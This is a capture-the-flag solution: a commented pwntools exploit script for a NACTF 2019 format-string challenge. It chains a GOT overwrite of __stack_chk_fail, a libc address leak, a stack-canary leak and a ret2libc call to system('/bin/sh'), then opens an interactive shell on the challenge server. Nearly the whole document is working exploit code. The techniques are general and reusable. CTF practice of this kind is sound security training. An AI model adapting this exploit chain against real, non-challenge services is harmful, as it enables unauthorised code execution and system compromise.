Rating:

```
from pwn import *

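# Exploit for the NACTF 2019 format-string challenge (pwntools, Python 3).
#
# Attack chain, in the order the script performs it:
#   1. Format-string write: point __stack_chk_fail@GOT at _start, so that
#      smashing the canary restarts the program instead of aborting it.
#   2. Format-string read (%s on a GOT slot): leak fwrite's libc address and
#      derive the libc base, system() and a "/bin/sh" string from it.
#   3. Format-string read: leak main()'s stack canary.
#   4. Plain stack overflow with the correct canary: ret2libc into
#      system("/bin/sh").
#
# The addresses and offsets below come from the challenge binary (fixed
# 0x0804xxxx addresses, i.e. non-PIE) and are only valid for that binary.
# libc.so.6 must be the libc shipped with the challenge, otherwise the
# fwrite/system/"/bin/sh" offsets will not match the remote.
HOST, PORT = 'shell.2019.nactf.com', 31732
PROMPT = b'Type something>'
ECHO = b'You typed: '

STACK_CHK_FAIL_GOT = 0x0804c014  # __stack_chk_fail@GOT; must be writable (no full RELRO)
FWRITE_GOT = 0x0804c018          # GOT slot read back as fwrite's resolved address
START = 0x08049090               # _start: re-enters the program cleanly
FMT_OFFSET = 7                   # index of the input buffer among printf's arguments
BUF_LEN = 64                     # bytes from the input buffer to the canary

r = remote(HOST, PORT)
libc = ELF('libc.so.6')

# 1. Overwrite __stack_chk_fail@GOT with _start.  The bytes past the 64-byte
#    buffer clobber the canary, so __stack_chk_fail() -- now _start -- runs.
payload = fmtstr_payload(FMT_OFFSET, {STACK_CHK_FAIL_GOT: START})
r.sendlineafter(PROMPT, payload.ljust(BUF_LEN, b'a') + b'a' * 6)

# 2. (program restarted) Leak *FWRITE_GOT: the address sits first in the buffer,
#    i.e. at argument FMT_OFFSET, and %s dereferences it.  Overflow again so the
#    (now harmless) canary check restarts the program.
leak = p32(FWRITE_GOT) + b'%7$s'
r.sendlineafter(PROMPT, leak.ljust(BUF_LEN, b'a') + b'aaaa')
r.recvuntil(ECHO)
r.recvn(4)  # the echoed FWRITE_GOT bytes themselves
# NOTE: %s stops at the first NUL byte, so a libc address containing 0x00
# would be truncated here; recvn() at least fails loudly instead of returning
# a short read that u32() would mis-parse.
libc_base = u32(r.recvn(4)) - libc.symbols['fwrite']
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

# 3. Leak main()'s canary from stack slot 31 (printed in hex, so the canary's
#    NUL low byte is not a problem).  The overflow restarts the program again.
r.sendlineafter(PROMPT, b'%31$x ' + b'a' * (32 - 6) + b'b' * 36)
r.recvuntil(ECHO)
canary = int(r.recvuntil(b' ').strip(), 16)

# 4. ret2libc: buffer | canary | 12 bytes of saved registers/ebp |
#    system() | fake return address (system again) | "/bin/sh"
rop = b'a' * BUF_LEN + p32(canary) + b'a' * 12 + p32(system_addr) * 2 + p32(binsh)
r.sendlineafter(PROMPT, rop)

r.interactive()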

```